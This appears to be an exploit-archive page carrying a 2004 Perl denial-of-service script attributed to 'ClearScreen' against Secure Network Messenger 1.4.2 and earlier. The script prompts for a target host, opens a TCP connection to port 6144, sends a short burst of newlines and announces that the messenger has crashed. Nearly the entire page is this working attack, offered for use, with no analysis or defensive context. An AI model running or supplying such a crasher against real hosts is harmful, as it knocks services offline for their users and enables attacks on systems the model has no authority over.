[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Secure Network Messenger <= 1.4.2 Denial of Service Exploit
# Published : 2004-11-15
# Author : ClearScreen
# Previous Title : Halo <= 1.05 Broadcast Client Crash Exploit
# Next Title : NetNote Server (<= 2.2 build 230) Crafted String DoS Exploit
#!/usr/bin/perl
use IO::Socket;
print ("nSecure Network Messenger Crasher by ClearScreenn");
print ("nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
Proto => "tcp",
PeerPort => "6144",
PeerAddr => "$h"
) or die "nNo response from host.";
sleep 1;
print "nSuccesfully connected to $h!n";
for ($count=1; $count<15; $count++)
{
print $socks "n";
select(undef, undef, undef, 0.1);
}
print "nMessenger crashed.";
close $socks;
# www.Syue.com [2004-11-15]